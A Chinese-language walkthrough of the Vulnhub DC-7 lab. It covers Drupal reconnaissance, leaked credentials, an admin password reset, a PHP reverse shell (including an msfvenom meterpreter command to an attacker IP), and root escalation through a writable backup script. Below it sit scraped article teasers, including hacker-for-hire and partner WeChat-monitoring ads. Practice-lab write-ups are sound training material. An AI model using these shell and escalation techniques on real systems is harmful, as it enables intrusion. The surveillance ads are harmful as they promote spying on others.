Vulnhub靶机DC系列-DC7
0x0:靶场介绍
靶场名称: DC: 7
靶场发布时间:2019-4-26
靶场地址:https://www.vulnhub.com/entry/dc-7,356/
靶场描述:
DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will need to do, is to think "outside" of the box.
Waaaaaay "outside" of the box. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet
1x0:环境搭建
VMware虚拟机(桥接模式)
2x0:靶机渗透
获取靶机的IP
nmap -sn 192.168.3.0/24
使用nmap来查看靶机的端口信息和系统信息等等
首先去查看80端口的web服务 Drupal
提示不用爆破破解,使用dirb扫描一下目录
存在robots.txt文件
登录地址:
install.mysql 403!
版本大致的判断:
kali去搜索一下drupal8版本的的漏洞(都利用失败了,看一下其他思路才知道需要去下载代码)
直接搜索@DC7USER即可
下载,代码审计 config.php 有数据库的配置信息(没有什么其他可以利用的点)
玄学登录SSH尝试下一把
牛皮。
有一份mbox 邮件
提供一个路径/opt/scripts/backups.sh
解开这个文件,也没什么用。
发现一个可以修改drupal的管理员密码的命令
回到网站去登录管理员账号
具体的版本号
这里需要反弹shell 利用上传插件 插件地址:https://www.drupal.org/project/php
上传插件
上传成功
勾选安装
上传反弹shell
在网上找到一个反向shell的php使用msf生成php_shell也可以
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.3.20 LPORT=1234 -f raw
下载地址:http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
下载下来,修改代码复制到文件中
修改一下既可(上传到页面保存就可以反弹出来)
3x0:提权篇
切换shell
发现backups.sh 具有root权限,但是在www-data组中 可以使用backups.sh 执行命令
直接写入反弹shell
等待连接即可
执行shell 等待连接
读取flag即可
相关文章
宠物狗狗训练有什么方法(最简单实用的狗狗训
狗狗养起来就是自己的毛孩子,智商有一定,懂人性,不懂事,平日如果饲养了狗狗,除了宠爱,更多的是要去引导和培训,有时候看着别人家的狗狗怎么就这么乖巧懂事,其实这个就是训练引导。小编想说的是爱犬就要从训练...
什么是两弹一星(两弹一星精神是什么)
我国“两弹一星”具体是指什么?有什么影响? 一开始,“两弹一星”是对中国依靠自己的力量掌握的核技术和空间技术的统称,并没有明确具体指哪两颗弹和哪一颗星。 战略核武器 后来,“两弹一星”指导弹...
如何找正规的黑客?这里有你想要找的
如何找正规的黑客 1.我如何才气找到我被删除的微信密友呢?把戏黑客技术。微信的身边的人关于事情和通常社群都是必不行少的。微友已被删除,有望规复。卓哥真的能做到吗?随同着怀疑,小编决意亲身尝试。微信密...
美媒说对华贸易天下大同什么意思战伤害美国经济
美媒说对华贸易战伤害美国经济 新华社华盛顿2月2日电 美国新闻网站Axios日前报道说,特朗普政府对中国发起的贸易战伤害了美国经济和就业,造成美国贸易逆差扩大和外国直接投资减少。 报道...
怎么同步我媳妇微信语音实用教程
近几年来,河南,山东、河北小麦种植区的农户,反映小麦出现有穗无籽的情况是越来越多,小麦有穗无籽,造成小麦减产严重,影响老百姓的种植收益。小麦为什么会出现有穗无籽现象呢?如何采取措施预防发生?下面就给大...
《爸哪》男孩都变样!joe长出胡子 天天身高逆天
曹格 joe 近日,曹格在社交平台晒出了和儿子joe的合照,照片发出后迅速上了热搜。从照片中看,joe长大了不少,他虽然才12岁,但却给人感觉格外的成熟。他皮肤...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!